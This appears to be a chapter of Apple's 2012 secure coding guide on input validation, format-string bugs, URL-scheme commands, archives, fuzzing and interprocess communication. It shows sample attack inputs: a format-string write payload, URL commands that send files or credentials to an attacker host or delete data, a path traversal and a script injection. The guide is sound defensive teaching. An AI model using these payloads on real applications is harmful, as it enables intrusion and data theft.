Validating Input and Interprocess Communication
A major, and growing, source of security vulnerabilities is the failure of programs to validate all input from outside the program—that is, data provided by users, from files, over the network, or by other processes. This chapter describes some of the ways in which unvalidated input can be exploited, and some coding techniques to practice and to avoid.
Risks of Unvalidated Input
Any time your program accepts input from an uncontrolled source, there is a potential for a user to pass in data that does not conform to your expectations. If you don’t validate the input, it might cause problems ranging from program crashes to allowing an attacker to execute his own code. There are a number of ways an attacker can take advantage of unvalidated input, including:
Buffer overflows
Format string vulnerabilities
URL commands
Code insertion
Social engineering
Many Apple security updates have been to fix input vulnerabilities, including a couple of vulnerabilities that hackers used to “jailbreak” iPhones. Input vulnerabilities are common and are often easily exploitable, but are also usually easily remedied.
Causing a Buffer Overflow
If your application takes input from a user or other untrusted source, it should never copy data into a fixed-length buffer without checking the length and truncating it if necessary. Otherwise, an attacker can use the input field to cause a buffer overflow. See “Avoiding Buffer Overflows And Underflows” to learn more.
Format String Attacks
If you are taking input from a user or other untrusted source and displaying it, you need to be careful that your display routines do not process format strings received from the untrusted source. For example, in the following code the syslog standard C library function is used to write a received HTTP request to the system log. Because the syslog function processes format strings, it will process any format strings included in the input packet:
/* receiving http packet */ |
int size = recv(fd, pktBuf, sizeof(pktBuf), 0); |
if (size) { |
syslog(LOG_INFO, "Received new HTTP request!"); |
syslog(LOG_INFO, pktBuf); |
} |
Many format strings can cause problems for applications. For example, suppose an attacker passes the following string in the input packet:
"AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%n" |
This string retrieves eight items from the stack. Assuming that the format string itself is stored on the stack, depending on the structure of the stack, this might effectively move the stack pointer back to the beginning of the format string. Then the %n token would cause the print function to take the number of bytes written so far and write that value to the memory address stored in the next parameter, which happens to be the format string. Thus, assuming a 32-bit architecture, the AAAA in the format string itself would be treated as the pointer value 0x41414141, and the value at that address would be overwritten with the number 76.
Doing this will usually cause a crash the next time the system has to access that memory location, but by using a string carefully crafted for a specific device and operating system, the attacker can write arbitrary data to any location. See the manual page for printf(3) for a full description of format string syntax.
To prevent format string attacks, make sure that no input data is ever passed as part of a format string. To fix this, just include your own format string in each such function call. For example, the call
printf(buffer)
may be subject to attack, but the call
printf("%s", buffer)
is not. In the second case, all characters in the buffer parameter—including percent signs (%)—are printed out rather than being interpreted as formatting tokens.
This situation can be made more complicated when a string is accidentally formatted more than once. In the following example, the informativeTextWithFormat argument of the NSAlert method alertWithMessageText:defaultButton:alternateButton:otherButton:informativeTextWithFormat: calls the NSString method stringWithFormat:GetLocalizedString rather than simply formatting the message string itself. As a result, the string is formatted twice, and the data from the imported certificate is used as part of the format string for the NSAlert method:
alert = [NSAlert alertWithMessageText:"Certificate Import Succeeded" |
defaultButton:"OK" |
alternateButton:nil |
otherButton:nil |
informativeTextWithFormat:[NSString stringWithFormat: |
@"The imported certificate \"%@\" has been selected in the certificate pop-up.", |
[selectedCert identifier]]]; |
[alert setAlertStyle:NSInformationalAlertStyle]; |
[alert runModal]; |
Instead, the string should be formatted only once, as follows:
[alert informativeTextWithFormat:@"The imported certificate \"%@\" has been selected in the certificate pop-up.", |
[selectedCert identifier]]; |
The following commonly-used functions and methods are subject to format-string attacks:
Standard C
printfand other functions listed on theprintf(3)manual pagescanfand other functions listed on thescanf(3)manual pagesyslogandvsyslog
Carbon
CFStringCreateWithFormatCFStringCreateWithFormatAndArgumentsCFStringAppendFormatAEBuildDescAEBuildParametersAEBuildAppleEvent
Cocoa
[NSString stringWithFormat:]and otherNSStringmethods that take formatted strings as arguments[NSString initWithFormat:]and otherNSStringmethods that take format strings as arguments[NSMutableString appendFormat:][NSAlert alertWithMessageText:defaultButton:alternateButton:otherButton:informativeTextWithFormat:][NSPredicate predicateWithFormat:]and[NSPredicate predicateWithFormat:arguments:][NSException raise:format:]and[NSException raise:format:arguments:]NSRunAlertPaneland other Application Kit functions that create or return panels or sheets
URLs and File Handling
If your application has registered a URL scheme, you have to be careful about how you process commands sent to your application through the URL string. Whether you make the commands public or not, hackers will try sending commands to your application. If, for example, you provide a link or links to launch your application from your web site, hackers will look to see what commands you’re sending and will try every variation on those commands they can think of. You must be prepared to handle, or to filter out, any commands that can be sent to your application, not only those commands that you would like to receive.
For example, if you accept a command that causes your application to send credentials back to your web server, don’t make the function handler general enough so that an attacker can substitute the URL of their own web server. Here are some examples of the sorts of commands that you should not accept:
myapp://cmd/run?program=/path/to/program/to/run
myapp://cmd/set_preference?use_ssl=false
myapp://cmd/sendfile?to=evil@attacker.com&file=some/data/file
myapp://cmd/delete?data_to_delete=my_document_ive_been_working_on
myapp://cmd/login_to?server_to_send_credentials=some.malicious.webserver.com
In general, don’t accept commands that include arbitrary URLs or complete pathnames.
If you accept text or other data in a URL command that you subsequently include in a function or method call, you could be subject to a format string attack (see “Format String Attacks”) or a buffer overflow attack (see “Causing a Buffer Overflow”). If you accept pathnames, be careful to guard against strings that might redirect a call to another directory; for example:
myapp://use_template?template=/../../../../../../../../some/other/file
Code Insertion
Unvalidated URL commands and text strings sometimes allow an attacker to insert code into a program, which the program then executes. For example, if your application processes HTML and Javascript when displaying text, and displays strings received through a URL command, an attacker could send a command something like this:
myapp://cmd/adduser='>"><script>javascript to run goes here</script> |
Similarly, HTML and other scripting languages can be inserted through URLs, text fields, and other data inputs, such as command lines and even graphics or audio files. You should either not execute scripts in data from an untrusted source, or you should validate all such data to make sure it conforms to your expectations for input. Never assume that the data you receive is well formed and valid; hackers and malicious users will try every sort of malformed data they can think of to see what effect it has on your program.
Social Engineering
Social engineering—essentially tricking the user—can be used with unvalidated input vulnerabilities to turn a minor annoyance into a major problem. For example, if your program accepts a URL command to delete a file, but first displays a dialog requesting permission from the user, you might be able to send a long-enough string to scroll the name of the file to be deleted past the end of the dialog. You could trick the user into thinking he was deleting something innocuous, such as unneeded cached data. For example:
myapp://cmd/delete?file=cached data that is slowing down your system.,realfile |
The user then might see a dialog with the text “Are you sure you want to delete cached data that is slowing down your system.” The name of the real file, in this scenario, is out of sight below the bottom of the dialog window. When the user clicks the “OK” button, however, the user’s real data is deleted.
Other examples of social engineering attacks include tricking a user into clicking on a link in a malicious web site or following a malicious URL.
For more information about social engineering, read “Designing Secure User Interfaces.”
Modifications to Archived Data
Archiving data, also known as object graph serialization, refers to converting a collection of interconnected objects into an architecture-independent stream of bytes that preserves the identity of and the relationships between the objects and values. Archives are used for writing data to a file, transmitting data between processes or across a network, or performing other types of data storage or exchange.
For example, in Cocoa, you can use a coder object to create and read from an archive, where a coder object is an instance of a concrete subclass of the abstract class NSCoder.
Object archives are problematic from a security perspective for several reasons.
First, an object archive expands into an object graph that can contain arbitrary instances of arbitrary classes. If an attacker substitutes an instance of a different class than you were expecting, you could get unexpected behavior.
Second, because an application must know the type of data stored in an archive in order to unarchive it, developers typically assume that the values being decoded are the same size and data type as the values they originally coded. However, when the data is stored in an insecure manner before being unarchived, this is not a safe assumption. If the archived data is not stored securely, it is possible for an attacker to modify the data before the application unarchives it.
If your initWithCoder: method does not carefully validate all the data it’s decoding to make sure it is well formed and does not exceed the memory space reserved for it, then by carefully crafting a corrupted archive, an attacker can cause a buffer overflow or trigger another vulnerability and possibly seize control of the system.
Third, some objects return a different object during unarchiving (see the NSKeyedUnarchiverDelegate method unarchiver:didDecodeObject:) or when they receive the message awakeAfterUsingCoder:. NSImage is one example of such a class—it may register itself for a name when unarchived, potentially taking the place of an image the application uses. An attacker might be able to take advantage of this to insert a maliciously corrupt image file into an application.
It’s worth keeping in mind that, even if you write completely safe code, there might still be security vulnerabilities in libraries called by your code. Specifically, the initWithCoder: methods of the superclasses of your classes are also involved in unarchiving.
To be completely safe, you should avoid using archived data as a serialization format for data that could potentially be stored or transmitted in an insecure fashion or that could potentially come from an untrusted source.
Note that nib files are archives, and these cautions apply equally to them. A nib file loaded from a signed application bundle should be trustable, but a nib file stored in an insecure location is not.
See “Risks of Unvalidated Input” for more information on the risks of reading unvalidated input, “Securing File Operations” for techniques you can use to keep your archive files secure, and the other sections in this chapter for details on validating input.
Fuzzing
Fuzzing, or fuzz testing, is the technique of randomly or selectively altering otherwise valid data and passing it to a program to see what happens. If the program crashes or otherwise misbehaves, that’s an indication of a potential vulnerability that might be exploitable. Fuzzing is a favorite tool of hackers who are looking for buffer overflows and the other types of vulnerabilities discussed in this chapter. Because it will be employed by hackers against your program, you should use it first, so you can close any vulnerabilities before they do.
Although you can never prove that your program is completely free of vulnerabilities, you can at least get rid of any that are easy to find this way. In this case, the developer’s job is much easier than that of the hacker. Whereas the hacker has to not only find input fields that might be vulnerable, but also must determine the exact nature of the vulnerability and then craft an attack that exploits it, you need only find the vulnerability, then look at the source code to determine how to close it. You don’t need to prove that the problem is exploitable—just assume that someone will find a way to exploit it, and fix it before they get an opportunity to try.
Fuzzing is best done with scripts or short programs that randomly vary the input passed to a program. Depending on the type of input you’re testing—text field, URL, data file, and so forth—you can try HTML, javascript, extra long strings, normally illegal characters, and so forth. If the program crashes or does anything unexpected, you need to examine the source code that handles that input to see what the problem is, and fix it.
For example, if your program asks for a filename, you should attempt to enter a string longer than the maximum legal filename. Or, if there is a field that specifies the size of a block of data, attempt to use a data block larger than the one you indicated in the size field.
The most interesting values to try when fuzzing are usually boundary values. For example, if a variable contains a signed integer, try passing the maximum and minimum values allowed for a signed integer of that size, along with 0, 1, and -1. If a data field should contain a string with no fewer than 1 byte and no more than 42 bytes, try zero bytes, 1 byte, 42 bytes, and 43 bytes. And so on.
In addition to boundary values, you should also try values that are way, way outside the expected values. For example, if your application is expecting an image that is up to 2,000 pixels by 3,000 pixels, you might modify the size fields to claim that the image is 65,535 pixels by 65,535 pixels. Using large values can uncover integer overflow bugs (and in some cases, NULL pointer handling bugs when a memory allocation fails). See “Avoiding Integer Overflows And Underflows” in “Avoiding Buffer Overflows And Underflows” for more information about integer overflows.
Inserting additional bytes of data into the middle or end of a file can also be a useful fuzzing technique in some cases. For example, if a file’s header indicates that it contains 1024 bytes after the header, the fuzzer could add a 1025th byte. The fuzzer could add an additional row or column of data in an image file. And so on.
Interprocess Communication and Networking
When communicating with another process, the most important thing to remember is that you cannot generally verify that the other process has not been compromised. Thus, you must treat it as untrusted and potentially hostile. All interprocess communication is potentially vulnerable to attacks if you do not properly validate input, avoid race conditions, and perform any other tests that are appropriate when working with data from a potentially hostile source.
Above and beyond these risks, however, some forms of interprocess communication have specific risks inherent to the communication mechanism. This section describes some of those risks.
- Mach messaging
When working with Mach messaging, it is important to never give the Mach task port of your process to any other. If you do, you are effectively allowing that process to arbitrarily modify the address space your process, which makes it trivial to compromise your process.
Instead, you should create a Mach port specifically for communicating with a given client.
- Remote procedure calls (RPC) and Distributed Objects:
If your application uses remote procedure calls or Distributed Objects, you are implicitly saying that you fully trust whatever process is at the other end of the connection. That process can call arbitrary functions within your code, and may even be able to arbitrarily overwrite portions of your code with malicious code.
For this reason, you should avoid using remote procedure calls or Distributed Objects when communicating with potentially untrusted processes, and in particular, you should never use these communication technologies across a network boundary.
- Shared Memory:
If you intend to share memory across applications, be careful to allocate any memory on the heap in page-aligned, page-sized blocks. If you share a block of memory that is not a whole page (or worse, if you share some portion of your application’s stack), you may be providing the process at the other end with the ability to overwrite portions of your code, stack, or other data in ways that can produce incorrect behavior, and may even allow injection of arbitrary code.
In addition to these risks, some forms of shared memory can also be subject to race condition attacks. Specifically, memory mapped files can be replaced with other files between when you create the file and when you open it. See “Securing File Operations” for more details.
Finally, named shared memory regions and memory mapped files can be accessed by any other process running as the user. For this reason, it is not safe to use non-anonymous shared memory for sending highly secret information between processes. Instead, allocate your shared memory region prior to creating the child process that needs to share that region, then pass
IPC_PRIVATEas the key forshmgetto ensure that the shared memory identifier is not easy to guess.Note: Shared memory regions are detached if you call
execor other similar functions. If you need to pass data in a secure way across anexecboundary, you must pass the shared memory ID to the child process. Ideally, you should do this using a secure mechanism, such as a pipe created using a call topipe.After the last child process that needs to use a particular shared memory region is running, the process that created the region should call
shmctlto remove the shared memory region. Doing so ensures that no further processes can attach to that region even if they manage to guess the region ID.shmctl(id, IPC_RMID, NULL);
- Signals:
A signal, in this context, is a particular type of content-free message sent from one process to another in a UNIX-based operating system such as OS X. Any program can register a signal handler function to perform specific operations upon receiving a signal.
In general, it is not safe to do a significant amount of work in a signal handler. There are only a handful of library functions and system calls that are safe to use in a signal handler (referred to as async-signal-safe calls), and this makes it somewhat difficult to safely perform work inside a call.
More importantly, however, as a programmer, you are not in control of when your application receives a signal. Thus, if an attacker can cause a signal to be delivered to your process (by overflowing a socket buffer, for example), the attacker can cause your signal handler code to execute at any time, between any two lines of code in your application. This can be problematic if there are certain places where executing that code would be dangerous.
For example, in 2004, a signal handler race condition was found in open-source code present in many UNIX-based operating systems. This bug made it possible for a remote attacker to execute arbitrary code or to stop the FTP daemon from working by causing it to read data from a socket and execute commands while it was still running as the root user. [CVE-2004-0794]
For this reason, signal handlers should do the minimum amount of work possible, and should perform the bulk of the work at a known location within the application’s main program loop.
For example, in an application based on Foundation or Core Foundation, you can create a pair of connected sockets by calling
socketpair, callsetsockoptto set the socket to non-blocking, turn one end into aCFStreamobject by callingCFStreamCreatePairWithSocket, and then schedule that stream on your run loop. Then, you can install a minimal signal handler that uses the write system call (which is async-signal-safe according to POSIX.1) to write data into the other socket. When the signal handler returns, your run loop will be woken up by data on the other socket, and you can then handle the signal at your convenience.Important: If you are writing to a socket in a signal handler and reading from it in a run loop on your main program thread, you must set the socket to non-blocking. If you do not, it is possible to cause your application to hang by sending it too many signals.
The queue for a socket is of finite size. When it fills up, if the socket is set to non-blocking, the write call fails, and the global variable errno is set to
EAGAIN. If the socket is blocking, however, the write call blocks until the queue empties enough to write the data.If a write call in a signal handler blocks, this prevents the signal handler from returning execution to the run loop. If that run loop is responsible for reading data from the socket, the queue will never empty, the write call will never unblock, and your application will basically hang (at least until the write call is interrupted by another signal).
© 2012 Apple Inc. All Rights Reserved. (Last updated: 2012-06-11)